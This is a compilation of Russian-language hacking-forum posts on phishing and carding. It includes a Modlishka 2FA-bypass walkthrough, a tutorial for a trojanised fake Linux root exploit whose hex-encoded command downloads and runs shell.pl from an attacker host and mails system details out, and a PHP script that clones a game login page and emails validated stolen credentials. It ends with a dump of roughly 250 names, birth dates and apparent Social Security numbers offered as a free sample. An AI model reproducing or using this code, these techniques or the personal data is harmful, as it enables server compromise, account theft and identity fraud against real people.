Code:Copy to clipboard
192.168.1.15 loopback.modlishka.io
В интернете я сначала попробовал зарегистрировать бесплатный домен 3-го уровня. Предполагал, что этого хватит, но не тут-то было! При переходе оказывалась лишь страница, что сайт недоступен, а при вводе IP-адреса через HTTPS редиректило на Google. По простому HTTP и вовсе открывалась приветственная страница Apache.
Как обычно, дьявол кроется в деталях. При переходе по URL в глобальной сети автоматом добавляется префикс www, а программа ждала чистого обращения к домену. Добавление www в конфиг не помогло, и пришлось добывать в свои владения полный пул поддоменов. Другими словами, если домен выглядит как loopback.modlishka.io, то иметь необходимо *.loopback.modlishka.io.
Следующая загвоздка касается сертификатов. Необходимо на зарегистрированный домен сделать сертификат и ключ. В идеале необходимо подписывать сертификат в удостоверяющем центре, но для теста можно использовать и самоподписанный.
Идем на любой [генератор сертификатов](https://regery.com.ua/ru/security/ssl- tools/self-signed-certificate-generator), делаем и скачиваем два файла. Их содержимое надо подставить в конфигурационный файл Modlishka соответственно полям "cert": "" и "certKey": "". Небольшая ремарка: сертификат и ключ должны указываться в одну строку, а перенос строки, как обычно, задается последовательностью \n.
Выглядеть должно примерно так:
Code:Copy to clipboard
"cert": "-----BEGIN CERTIFICATE-----\nMIIDJTCCAg2gAwIBAgIESjdT0DANBgkqhkiG9w0BAQsFADApMScwJQYDVQQDDB5SZWdlcnkgU2Vs\n...".
Также в конфигурационном файле нам необходимо изменить пару других параметров:
Modlishka каждый раз разворачивается для конкретных доменных имен. Поэтому лучше изначально регистрировать доменное имя, затем получать сертификат и только потом разворачивать техническую часть. В таком случае можно импортировать содержимое сертификатов в autocert.go, и прописывать ключ с сертификатом в файл конфигурации уже не потребуется.
Взломать хакера
Этот стенд я тестировал с редактором журнала «Хакер» Андреем Васильковым,
который выступал в роли очень наивной жертвы. На google.com адрес моего домена
ничуть не похож, но мы решили пропустить обфускацию. Об этом уже была
отдельная статья, и
не одна.
Результаты совместного эксперимента можно увидеть на скриншотах. Андрей находился в другом городе и ~~поэтому ничего не мог мне сделать~~ подключался через другого провайдера, заходя на мой фишинговый сайт через десктопный Firefox v. 67.0.
Сначала он скачал поддельный сертификат моего домена (он похож на домен банка) и установил его в браузере. В реальной жизни мотивировать на такой отчаянный поступок можно под видом заботы о безопасности (хе-хе), промоакции или сыграть на жадности/страхе тысячью одним другим способом.
Жертва ставит сертификат
В адресной строке творится безобразие, но мало кто в нее смотрит (на мобильных браузерах она вообще скрывается для экономии места на экране). Зеленый замочек «защищенного» соединения вселяет уверенность, а панель авторизации Google вообще загружается оригинальная.
Ловушка для невнимательных
Первый этап прошел успешно — Андрей ввел свой логин и пароль, после чего Google отправил ему одноразовый код подтверждения в SMS.
Запрос кода подтверждения
Меньше чем через минуту Андрей вводит его в стандартное поле верификации. Он вошел в свой аккаунт… и я тоже!
Полный перехват авторизации
После этого мне открылась полная свобода действий. Почта, диск, контакты, история браузера, история географических перемещений, списки установленных приложений, сохраненные пароли точек доступа Wi-Fi и бэкапы. Просто цифровой Клондайк!
Взломанная почта
Самое главное — удалось перехватить активную сессию.
Панель управления Modlishka
Важное примечание: если аккаунт используется на смартфоне, то пользователю отправится push-уведомление о том, что был совершен вход в аккаунт с нового устройства. Однако у хакера есть время войти в почту и удалить это письмо. Для жертвы все будет выглядеть как глюк системы уведомлений, если она вообще на него среагирует.
Выводы
Сессия в панели управления Modlishka очень живучая. Она не умирает до тех пор,
пока из нее самой не выйдет пользователь (либо хакер). То есть, если жертва
закроет вкладку, авторизованная сессия останется активной. Если заново
авторизоваться напрямую на google.com, а потом выйти из аккаунта, то сессия
все равно останется живой. Даже если остановить сервер Modlishka и запустить
его заново — сессия все равно остается. Есть только одна гарантированная
возможность деавторизации — выйти в тот момент, когда только «редиректишься»
на прокси.
Хоть в статье и были описаны технические детали, обход 2FA не сработает без социальной инженерии. Нужно замаскировать сайт и как-то установить сертификат на компьютер жертвы. Впрочем, это может оказаться не так уж сложно. Большинство пользователей охотно выполняют инструкции, начинающиеся со слов «отключите антивирус и файрвол», а уж в установке сертификата мало кто из обывателей увидит потенциальную опасность.
Автор 8bit (c)xakep.ru
Такс сейчас я изложу одну достаточно эфективную схему фишинга ....
А улов мы будем на сей раз собирать не с ушастых юзверей а с админов хостингов
, мерчант сервисов, ну и прочих интерестных вещей) ......
Начнем с того что запасемся приличным маил листом нащих жертв (имеются ввиду список маилов админов которых будем разводить)
Понятное дело что администратор сервера как правило человек образованный ,
подозрительный и технически подкованный ... поэтому работать нужно окуратно и
чотко.
Для начала регним домен из ряда security-problems.org, security-kernel.us ну и
в таком плане а также создадим мыльник на нашем свежеиспечонном домене
support@security-problem.org (беру в качестве примера)
а теперь приготовимся готовить ширму для наших ушастых )
Что будем использовать в качестве ширмы? ... а использовать будем "эксплоит
для использования локальной уязвимости системы"
Который вместо того чтобы чекнуть систему на наличие бага сделает то что нам
нужно (к примеру сольет с хостинга бекдор и запустит его на ремотной машине)
Наш сплоит нужно написать так чтобы умный ушастый не сообразил истинность его
действий ....
Вот к этому сейчас и приступим .
Для начала определим набор комманд которые должен будет выполнить нас сплоит
.....
Code:
which wget
-P/tmp http://ourhost.com/shell.pl;perl /tmp/shell.pl;
rm /tmp/shell.pl;echo "whoami
@hostname -i
"| mail uormail@usa.com
Этот набор комманд сливает скрипт бекдора shell.pl запускает его ..... и шлет
на наш почтовый адрес информацию вида
утилу для кодирования набора комманд в HEX напишим сами .... ее код
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EOF -1
main()
{
char c;
while ((c = getchar())!= EOF)
printf("\\x%X", c);
}
теперь пусть файл shell.txt содержит наш набор комманд ... кодируем его в HEX
Code:
type shell.txt | HEX.exe > shell_codeготово .... теперь посмотрим как выглядит наш набор комманд после кодирования в HEX
Code:
\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65
\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20
\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72
\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73
\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65
\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68
\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20
\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C
\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22
\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60
\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D
\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F
\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61
\x2E\x63\x6F\x6D\xA
ну епт) чем вам не настоящий шел код настоящего сплоита)))комар носа не
подточит)) ... декодирование этой штуки произйдет ещо проще)) ....
декодирование мы произведем в самом сплоите) .... теперь примимся за кодинг)
Code:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65"
"\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20"
"\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72"
"\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73"
"\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65"
"\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68"
"\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20"
"\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C"
"\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22"
"\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D"
"\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F"
"\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61"
"\x2E\x63\x6F\x6D\xA"
//описали масив с шел кодом
#define LSIZE 256
#define BUFSIZE 2000
int main(int argc, char *argv[])
{
char *buf;
if (argc != 2) {
//Это так сказать для пущей уверености что перед ушастым именно сплоит
//при чом сплоит какойто новенький
printf("\nLocal r00t exploit for Linux kernel 2.4.20-2.4.27,2.6.*\n");
printf("Tested on Linux Enterprise 3, Red Hat Linux 9.2, Mandrake Linux 10");
printf("\n - ret addr for Enterprise Linux : 0x1f4c00\n");
printf("\n - ret addr for Red Hat Linux : 0x1d3fa5\n");
printf("\n - ret addr for Mandrake Linux : 0x2f4d56\n");
printf("\n-b : brute mode");
printf("Usage: %s -r [ret addr] [-b]\n\n", argv[0]);
exit(1);
}
//дальше помещаем наш шел-код в память одновременно преобразуя его
//к нормальному виду
buf = (char *) malloc(LSIZE + BUFSIZE + 100);
memcpy(&buf[LSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
//а тут пишем как можно больше логически правильной
//лабуды)) ее я писать не буду) дайте волю фантази
//и наконец выполнение нужных нам действий
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);while(1);
}
ну что со сплоитом справились ..... теперь приступаем к спаму .....
письмо буим слать вида
"МЫ мол трудолюбивая секьюрити-организация интузиастов кодеров хатим мир во
всем мире и искоренить хакеров ..." ну и в подобном ключе)
берем наш маил-лист и спамим -спамим-спамим ..... а потом раскидываемся в
кресле открываем бутылочку пива и ждем уведомлений от наших бекдоров))
Удачи)) ...
P.S. Метод на практике показал достаточно высокие результаты и показатели)
дерзайте
статья взята с https:\\mazafаka.info
Скамы (SCAM) - фейки сайтов,создаваемые с целью сбора вводимой информации,будь то идентификационные данные либо какая-то ценная информация.Зачастую скамы играют на руку кардерам - нередки случаи создания липовых шопов.
Создание скама зачастую сводится к изменению скрипта-обработчика таким образом,чтобы данные отсылались не на оригинальный сайт,а собирались в файле либо сразу отсылались на почту к злоумышленику.Дизан таких сайтов ничуть не отличается от их братьев-оригиналов и заподозрить неладное может только опытный пользователь или же сам проект вводит защиту от фишинга.Yahoo предлагает вводить заведомо введенные данные при аутенфикации или например использовать форму логина заданного цвета.Firefox второй ветки сравнивает сайт с черным списком и в случае обнаружения поддельного сайта извещает юзера и не дает ввести данные.Internet Explorer такжи имеет защиту,но фильтр надо качать отдельно ( http://g.msn.com/8SEENUS020100/AddinsPhish...and_downloadURL )
Для примера создадим грамотный фейк популярной онлайн-игры ganjawars.ru.Скрипт будет не только собирать введенную информацию,но и проверять подлинность введенных данных,и в случае существования введенного юзера и правильности логина и пароля перебрасывать его на страницу с неправильно введенным паролем чтобы не вызывать подозрения.
Для начала сохраним страницу к себе на жесткий диск и посмотрим куда идут введенные логин с паролем.
Изменяем поле обработчика action с удаленного http://www.ganjawars.ru/login.php на локальный login.php.Снифаем запрос логина.В случае правильной связки вводимых данных сервер ответит 302 Found,в обратном - "Неверно указан пароль",если же логин не существует - "Неверно указан никнейм".
Code:Copy to clipboard
<?php
# обьявяем переменные
define ( _Mail,"gemaglabin@asechka.ru");
define ( _Subj,"New ganjawars account");
# данные переданы,начинаем процедуру логина
if (isset($_POST['login']) && isset($_POST['pass']))
{
# коннектимся к ganjawars.ru
$fsock = fsockopen("ganjawars.ru",80,$err,$errdesc,3);
# формируем запрос
$params = "login=".$_POST['login']."&pass=".$_POST['pass'];
$request = "POST /login.php HTTP/1.1\r\n";
$request .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\r\n";
$request .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$request .= "Referer: http://ganjawars.ru/login.php\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Host: ganjawars.ru\r\n";
$request .= "Content-Length: ".strlen($params)."\r\n";
$request .= "Connection: Keep-Alive\r\n\r\n";
$request .= $params;
# отсылаем запрос
fwrite($fsock,$request);
# принимаем ответ сервера
while (!feof($fsock)) $responce .= fgets($fsock,1024);
# обрабатываем ответ
if (strpos($responce,"302 Found"))
{
$msg = "New account : ".$_POST['login']." : ".$_POST['pass'];
mail (_Mail,_Subj,$msg,"From: admin@ganjawars.ru");
$fd = fopen("_login.php","r");
$log = fread($fd,filesize("_login.php"));
fclose($fd);
echo $log;
}
if (strpos($responce,"Неверно указан никнейм"))
{
$responce = substr($responce,strpos($responce,"<"));
print $responce;
}
if (strpos($responce,"Неверно указан пароль"))
{
$responce = substr($responce,strpos($responce,"<"));
print $responce;
}
}
В случае правильного пароля мы отсылаем его на заданное мыло и показываем содержимое файла _login.php где четко говорится что пароль указан неверно (предварительно мы сохранили этот файл - сделали запрос с заведомо неправильным паролем ).Если же юзер не существует или пароль неверен выводим ответ сервера отделенный от хидера,где обработчик формы будет уже на оригинальном сервера ganjawars.ru
Скрипт прекрасно работает и рядовой юзер врядли догадается что его обманывают.Не стоит забывать о мелочах.Несоответствие времени , логотипа или новостей может вызвать подозрение.Универсальный вариант - загрузка оригинальной страницы и замена скрипта обработчика на лету.EOF
Fake (фэйк) - подделка, обман. Слово фэйк используется в разных ситуациях и терминологиях, но смысл при этом остаётся неизменным.
Нас, кардеров, интересует всё что связанно с Интернетом и чужими деньгами. Что
нам нужно для получения чужих денег? Правильно, приватная информация! Что
подразумевает понятие «приватная информация» думаю все знают. Итак, какая она
бывает и где же её достать??
Начнём по порядку: сколько раз в неделю John Smith занимается сексом это
приватная информация, но она (по крайней мере мне) не нужна, а вот номер его
кредитки, логин и пароль от e-gold, ebay, почты, банковского аккаунта, и т.д.
может пригодится ;-).
Вопрос номер два. Где и как достать эту информацию?
Тут как всегда есть 2 варианта:
1. купить;
2. достать самому;
Как и у кого покупать приватную информацию рассказывать пожалуй не стану, а
перейду сразу ко второму варианту.
Итак, как самому достать информацию, о которую не знают даже родственники
владельца? Как получить пароли которые в голове у хозяина?? Как узнать ID
который он вводит только на сайте банка???
Речь идет о фишинге. Что это такое?
Само слово "фишинг" происходит от английского fishing, что, в свою очередь,
переводится как рыбалка. И в этом нет ничего удивительного.
Фишинг - это особый вид мошенничества в Глобальной сети, очень похожий на
рыбную ловлю. Нужно всего лишь закинуть приманку и "вылавливать" всех
"рыбок"-интернетчиков, которые на нее клюнут.
Сегодня существует три вида фишинга - почтовый, онлайновый и комбинированный.
Первый из них самый старый. Он заключается в отправке жертве специального
письма по электронной почте с требованием выслать в ответ какие-либо данные.
Это полный бред, никогда не занимался такой ерундой и вам не советую,
эффективность этого вида стремится к 0. Перейдём сразу ко второму:
Под онлайновым фишингом подразумеваются аферы, когда фишеры копируют какие-
либо сайты, например интернет-магазины. При этом они используют похожие
доменные имена и идентичный дизайн, такой поддельный сайт и называет ФЭЙКОМ.
Ну а дальше происходит следующее. Допустим, жертва, попавшая в такой магазин,
решила приобрести какой-либо товар. Причем число таких людей достаточно
велико. Ведь мы будем предлагать различные вещи за копейки (привет
Эльдорадо!). Ну а подозрения, которые могли бы возникнуть у потенциальных
жертв, рассеиваются благодаря известности копируемого сайта. Все-таки люди
считают, что они находятся на веб-сервере реально действующего и имеющего
хорошую репутацию магазина (банка, почтового сервера и т.д.). Решив приобрести
товар, жертва регистрируется в системе. При этом есть достаточно большая
вероятность того, что для этого он использует точно такой же пароль, как и в
других сервисах (многие люди всегда используют одно ключевое слово (логин,
пароль), несмотря на все предупреждения со стороны специалистов по
информационной безопасности). Кроме того, для покупки товара жертва введет
номер и прочие данные своей пластиковой карты (либо какую то другую приват
инфу). А именно это нам и нужно!
Конечно это здорово, но всё равно далеко не каждый повётся на такую приманку.
Поэтому на смену онлайн-фишинга пришёл третий тип фишинга, комбинированный.
Суть этого способа обмана заключается в следующем. Создается ФЭЙК сайт какой-
либо организации, а затем завлекаются на него пользователи.
Как завлекаются? Лично мне известны 2 хороших варианта:
1. Спам
2. Трой
Расскажу как фишить спамом.
В тексте письма жертве должно всего лишь предлагаться зайти на корпоративный
сайт по приведенной ссылке (ссылка разумеется на фэйк) и самому произвести
необходимые операции. Так, например, однажды многие владельцы пластиковых карт
одного из крупных банков получили особое электронное письмо. В нем было
написано примерно следующее: "Сегодня на ваш счет пришел перевод, сумма
которого превышает 1000 долларов. В соответствии с нормативными актами и
договором вам необходимо подтвердить его получение. Если в течение трех суток
вы этого не сделаете, деньги будут отправлены обратно. Для того чтобы
подтвердить получение перевода, откройте ссылку в конце этого письма и введите
необходимую информацию". Под необходимой информацией, естественно,
подразумеваются номер пластиковой карты, срок ее действия, наличие или
отсутствие овердрафта и т. п. И многие люди не смогли перебороть свою
жадность, оставив важную информацию на растерзание фишеру.
Фишить троем конечно проще, в плане затрат времени на написание писем и
подбора спам баз, но сложнее в плане…
Итак, что должен делать трой? Всё очень просто, при запросе определенного УРЛ,
он должен открывать не реальный сайт а наш фэйк при это в адресной строке
обозревателя отображать урл реального сайта. При таком подходе стоит подумать,
сколько фэйков нужно делать? Разумеется чем больше тем лучше, фэйки нужно
подбирать и делать после того как известна локация трафа который будет
заражаться вашим троем. Например вы покупаете 1к загрузок по Канаде. Стоит
поинтересоваться какие банки наиболее распространенны среди канадцев и что
хорошо фишится. Или наоборот, определившись с тем, какую информацию и откуда
вы собираетесь фишить, подбирать трафф.
Это теже самые вирусы только в отличе от обычных вирусов они не уничтожают ваши данные на винте, они не остаються на вашем винте до тех пор пока вы его не отформатируете, но они остаются у вас в голове и уничтожают ваш мозг. Они такие же бессмысленые как эти вирусы т.к. никакой рекламы они не несут, только портят нервы обычных пользователей.
Spoiler: 1000
(господи, во чушь какую сказал, пред открытием раздела либо удалить либо подкоректить)
Вот пример:
Теперь каждый человек, у которого в контакт листе более 35 контактов, будет считаться VIP-пользователем. Цветок этого пользователя станет золотым. Для того чтобы активизировать эту функцию отправьте это сообщение всем своим 35+ контактам
Click to expand...
350 free private Name | DOB | SEX | SSN see my other thread for sales
[CLIKE]FACKRELL BRADLEY DEVON 19661113 Male 528373326
BUNDERSON JOHN STUART 19661121 Male 528172104
LINDGREN MARGITTA E 19661204 Female 528499772
SMITH MICHAEL PATRICK 19661208 Male 528251804
DAY TRICIA L 19661213 Female 528040658
BILLIN CAMI R 19661214 Female 528987491
JOHNSON RONALD BLANE 19661214 Male 528087262
GOOCH PAUL R 19661231 Male 528352394
ANSON RONALD EDWARD 19670101 Male 528432311
WINDER WAYNE E 19670104 Male 528352588
BAKER DEBORAH M 19670107 Female 528432968
JOYCE JEFFREY T 19670122 Male 528315559
STURGIS JEFFREY KIM 19670203 Male 528314430
JOHNSON WENDELL ROBERT 19670210 Male 528374794
CRUZ ABRAHAM H 19670214 Male 528417290
FULLMER DOUGLAS D 19670224 Male 528435477
ROE JULIE MAY 19670228 Female 528216947
DOXEY DAVID E 19670307 Male 528847881
MILLER LESA RENEE 19670308 Female 528390543
WEST CARLA R 19670331 Female 528179862
BUSH DAVID SHAWN 19670414 Male 528331349
WALLIN ANTHONY R 19670414 Male 528430962
JORGENSEN ERIK LEE 19670416 Male 528115925
HUMBLE BYRON JAY 19670418 Male 528312635
VANLEEUWEN CATHERINE W 19670425 Female 528355765
MCALLISTER RACHAEL NOEL 19670501 Female 528294124
BRUNS WYNETTE 19670505 Female 528419374
ETTER TIFFIN T 19670508 Female 528353269
WRIGHT JORDAN WILLIS 19670513 Male 528271228
HADFIELD RANDAL L 19670514 Male 528336952
SIEGEL TIFFANY R 19670601 Female 528233094
PRIESTLEY TAMARA L 19670604 Female 528457951
BASHRUM TOMMY JOE 19670606 Male 528437015
GESS JAMES PATRICK 19670610 Male 528049414
HARSHBARGER GANIA NATHALIE 19670618 Female 528853410
REED JOHN NOLAN 19670708 Male 528802486
BROADBENT MARY CATHERINE 19670716 Female 528336432
STAROSTKA ANDREW B 19670724 Male 528067938
AFANA USAMA MOHAMMED 19670725 Male 528555481
MEADOWS BRYAN ALLPHIN 19670726 Male 528493936
ZIMMERMAN PATRICK HARDIN 19670727 Male 528510070
MCGEE CORRINA SHINER 19670806 Female 528113656
POUNDS LAUREL 19670811 Female 528417153
CULKIN WILLIAM R 19670818 Male 528981500
WEBB JAMES D 19670823 Male 528353856
KUNNEMANN PETULA ANN 19670902 Female 528025906
WHITAKER RICHARD M 19670902 Male 528395547
KONOLD JENNIFER L 19670914 Female 528177667
ZIMMERMAN LISA SODERBERG 19670914 Female 528393844
MCDONALD LANCE C 19670921 Male 528537017
DURHAM KIMBERLY ANN 19670927 Female 528217504
NEBEKER BRIAN CLIFFORD 19670927 Male 528066081
KIRKPATRICK WILLIAM R 19671002 Male 528338928
MILLS JAMES PATRICK 19671003 Male 528172003
DEPRIEST HEATHER 19671011 Female 528867202
YOUNG STACY G 19671011 Male 528350906
WAGSTAFF JAMES L 19671016 Male 528907912
HOOPES ROBIN L 19671019 Female 528335230
GROGAN ARCHIE THOMAS 19671102 Male 528086615
THORNE ELEANOR T 19671110 Female 528538988
HILL DALE R 19671111 Male 528435529
BECKER VICKIE R 19671121 Female 528158974
MEMMOTT STEPHANIE A 19671124 Female 528966472
NORIEGA JOHN EUGENE 19671125 Male 528412217
GOLDSBERRY BART LEE 19671126 Male 528151803
BERGSTEDT-BROWN ELLEN B 19671201 Female 528410962
JONES FRANKLIN EUGENE 19671205 Male 528215838
FRIEND RICHARD S 19671209 Male 528949155
COLLINS DEBRA MERLE 19671221 Female 528086076
JACINTHO CRAIG 19680126 Male 528217437
PARRISH LISA ANN 19680130 Female 528133716
BROWN BRENDA LEA 19680205 Female 528067732
WUNDER ELIZABETH MARIE 19680212 Female 528471288
BASS DEANN P 19680304 Female 528394045
EPPERLEY PAUL V 19680304 Male 528967036
COX MATTHEW ALLAN 19680312 Male 528085361
SMITH KAYE MARIE 19680328 Female 528476891
LOWE JULIA B JENNINGS 19680413 Female 528237677
DICKEY MICHELE 19680416 Female 528884347
BLAKE LISA M 19680425 Female 528960164
LANDRAM SEAN GARY 19680502 Male 528472192
CHUGG CHRISTIAN ROBERT 19680506 Male 528219939
BUSH ERIC C 19680522 Male 528351735
HUBER ALICE OVESON 19680523 Female 528234776
LACINA DONALD SCOTT 19680524 Male 528945022
FULLMER DANIEL RICHARDS 19680526 Male 528413774
BAKER LISA K 19680528 Female 528497938
COOPER TINA MARIE 19680529 Female 528118964
HOWELLS AMY JO 19680605 Female 528359659
HONEY SHARON R 19680615 Female 528392555
MAKKAWITA JAYAKA CHAMINDA 19680628 Male 528874858
COLE RHONDA J 19680716 Female 528239345
BASHRUM WAYLAN EUGENE 19680717 Male 528435067
MCGINLEY MARY KELLEY 19680722 Female 528572459
ENKE MICHAEL SHAWN 19680723 Male 528494396
HONEY MARK RICHARD 19680725 Male 528398892
DICKSON DANE J 19680726 Male 528374501
PACE BRADLEY W 19680731 Male 528512830
MCBAIN CYNTHIA REBECCA 19680801 Female 528476665
KELSCH JOAN K 19680804 Female 528435314
DUNCAN ROBERT B 19680810 Male 528190687
DEAN BRENT T 19680817 Male 528377521
JONES JAMIE J 19680907 Male 528150076
DRECKSEL JASON L 19681007 Male 528392493
FERGUSON SCOTT B 19681008 Male 528397327
DENKERS BRYAN TROY 19681010 Male 528315677
HOWELL DEANNA 19681013 Female 528278032
BATTAGLIA SANDRA D 19681027 Female 528218282
BEDORE BRANDON B 19681105 Male 528290637
HOSS ARIANA LUCRETIA 19681106 Female 528135576
PERRY BRIAN K 19681106 Male 528270583
KROGH LORI 19681130 Female 528531648
PETERSON TRENT G 19681204 Male 528967585
PACE BARBARA MINER 19681214 Female 528530390
DULLE RICHARD VICTOR 19681215 Male 528924538
JOHNSON PATRICIA S 19681221 Female 528490871
MALONE SEAN PATRICK 19681230 Male 528372642
HIRST PAUL M 19690125 Male 528412190
COFFMAN JOANN KATHLEEN 19690303 Female 528130964
BILLS SINDY RAE 19690314 Female 528476417
FUHRMANN SUZETTE LANAE 19690315 Female 528238049
MCCOARD BART R 19690319 Male 528515206
SHEFFIELD MATTHEW BOYD 19690325 Male 528194832
CRAWFORD PAMELA DAY 19690402 Female 528880480
HEIBEL CINDY MARIE 19690426 Female 528138080
GESS RONALD GLENN 19690506 Male 528393871
HUMBLE JOHN HUFF 19690510 Male 528371385
STECK BRIAN K 19690517 Male 528213267
AMOR SARIAH JANE 19690524 Female 528456737
BRADSHAW CHARLES C 19690524 Male 528354228
BUTTERFIELD JOSEPH SHANE 19690525 Male 528158527
DRECKSEL SALLY LYNNE 19690602 Female 528530236
DUNCAN LIBBY CHRISTINE 19690609 Female 528084115
BRIGGS JANAE CARSON 19690615 Female 528217669
GULICK CHRISTAL JEANETT 19690616 Female 528191515
BOSTER TIA M 19690618 Female 528454094
JEPPESEN BRUCE L 19690621 Male 528178915
REED TIFINY ANN MARIE 19690628 Female 528577892
CONTRERAS JOSE ANTONIO 19690719 Male 528141902
MUSSER ELIZABETH 19690720 Female 528473623
WEBB STEPHEN G 19690722 Male 528530887
JONES ALEXANDER ALFRED 19690801 Male 528215823
OTOOLE KIMBERLY B 19690810 Female 528611214
KLEIER JILL M 19690813 Female 528392632
FINNEGAN DAVID W 19690818 Male 528495678
WILLIAMS MICHAEL JOHN 19690822 Male 528216708
GLADDEN DONALD R 19690823 Male 528478790
PHILLIPS CATHY JO 19690829 Female 528115462
ARMISTEAD PETER R 19690901 Male 528234781
OTT JULIE LIGHTNER 19690913 Female 528531039
KUMP HEIDI PASCHAL 19690917 Female 528452048
DODDS WILLIAM C 19690919 Male 528439683
MCCLEAN TODD DOUGLAS 19690922 Male 528535158
NAYLOR HEIDI LIBERTINI 19691017 Female 528250912
BARKER SHAUNA S 19691101 Female 528479921
WHITAKER-LEE WYNDI L 19691101 Female 528157209
GEHL RANDY H 19691112 Male 528414747
BOATMAN MARCUS LEE 19691117 Male 528135467
RUSSO STELLA CECILIA 19691120 Female 528793314
RICHARDSON R HANS ZACHARY 19691121 Male 528080823
CRIM MICHAEL ALAN 19691203 Male 528494410
NAUMANN ALYSSA P 19691204 Female 528275576
SOMMERFELD JONATHAN GLENN 19691214 Male 528492055
DAWSON BARBARA HANDY 19691217 Female 528432524
BOAL DEEDEE KAYE 19700102 Female 528086109
RONDOMANSKI KATHY JO 19700105 Female 528594835
POMERINKE RONNIE JAY 19700108 Male 528082274
ASHMENT TERRI LYNN 19700110 Female 528315504
REYNOLDS LORI ALYCE 19700 128 Female 528155875
SMITH MARK DOUGLAS 19700210 Male 528191902
KIRK HILARY ANN 19700211 Female 528066098
BEAGLEY SHIRLEY 19700214 Female 528947725
COLEMAN JEANNIE CELESTE 19700311 Female 528376865
LANGE TRENNA L 19700314 Female 528377188
STOOPS SHEILA K 19700322 Female 528490942
JOYCE AURA LEE 19700407 Male 528392938
WILLYARD CURTIS REED 19700411 Male 528599588
JONES MAURIE D 19700419 Female 528572598
MULL ROBERT L 19700423 Male 528211041
CASE STACY RAE 19700505 Female 528047830
PRATER KIMBERLY ANN 19700512 Female 528117692
HARRIS HEIDI T 19700520 Female 528371735
FARKAS JASON TROY 19700526 Male 528534550
FOX CHARLIE BOYD 19700526 Male 528961309
GARCIA MANUEL TENA 19700531 Male 528879868
BUCHANAN-SMITH KIMBERLY ANN 19700607 Female 528333356
NORRIS FREDRICA ANNE 19700608 Female 528117874
TAPP SAND KOSUTH KULAK 19700614 Male 528111892
JOHNSON RACHEL M 19700615 Female 528453745
SPECKMAN JENNIFER 19700623 Female 528210133
SLOAN RICHARD ANDREW 19700624 Male 528133684
FORREST GARY J 19700629 Male 528570760
CROSS TIFFANY WARE 19700712 Female 528678728
HARDMAN LAURA ANDERSEN 19700713 Female 528175649
OWEN DANA L 19700715 Female 528613242
WELSH JENNIFER LYNN 19700715 Female 528671756
TEIBERIS BRETT LOUIS 19700723 Male 528476351
EAGLE AMY HEATHER 19700725 Female 528157454
GERHOLDT ROBERT A 19700730 Male 528513402
HARRIS MICHELLE LEE 19700813 Female 528210255
KETTLEWELL LISA R 19700912 Female 528559308
HAIL ANDREA C 19700915 Female 528414363
GABBITAS MARGARET ANN 19701020 Female 528271524
OTTINGER JULENE WHITE 19701022 Female 528459268
DAVIS HEATHER PAUL 19701027 Female 528573634
TOWNSEND ELIZABETH MARIE 19701103 Female 528576567
NIELSON BRADY ALLAN 19701111 Male 528652182
WILLIAMS BARRY ALLEN 19701112 Male 528216672
JAMES LISA DAWN 19701120 Female 528139976
DEFRIEZ MICHELLE A 19701121 Female 528573167
SHAW JASON LEHI 19701130 Male 528610582
VANDERHULE TROY DANIEL 19701203 Male 528088569
HOLDER MARNIE JO 19701207 Female 528891554
KIRKPATRICK GERALD ANTHONY 19701218 Male 528338893
CARTER KATHLEEN M 19701219 Female 528593060
COMBS TOMMY MARTIN 19701221 Male 528619397
STRAWBRIDGE LORI LYNN 19701229 Female 528216819
FINNEGAN LAURA 19701231 Female 528292661
TAYSOM TAMERA LYNN 19710109 Female 528069873
HADDAN RICHARD THOMAS 19710111 Male 528613400
SEWELL JON ISAAC 19710117 Male 528066225
BONNETT CHERYL LOUISE 19710127 Female 528903998
BRENNER SEAN THOMAS 19710214 Male 528133781
MOHR PATRICK REED 19710215 Male 528150391
LOFGREN SAMUEL D 19710216 Male 528473473
MCGEHEE-REED CHRISTINA L 19710218 Female 528061800
NUNEZ HECTOR RAUL 19710218 Male 528796134
LAWSON DAWNA MARIE 19710220 Female 528067304
WEBSTER JACOB W 19710227 Male 528778226
BURDETT DIANE 19710310 Female 528595477
THORLEY JANALEE SANDERS 19710319 Female 528290458
CONKEL SEAN PATRICK 19710422 Male 528577221
BEGEY TODD CHRISTIAN 19710602 Male 528813167
TROYER TRAVIS CHRISTO 19710602 Male 528577197
NICHOLS ASHLEY LYNNE 19710610 Female 528577956
COOK JASON AARON 19710619 Male 528292699
SMITH GARRETT BONA 19710619 Male 528513610
NIELSEN JAMES D 19710702 Male 528675156
ANDERSON LAURA V 19710703 Female 528375184
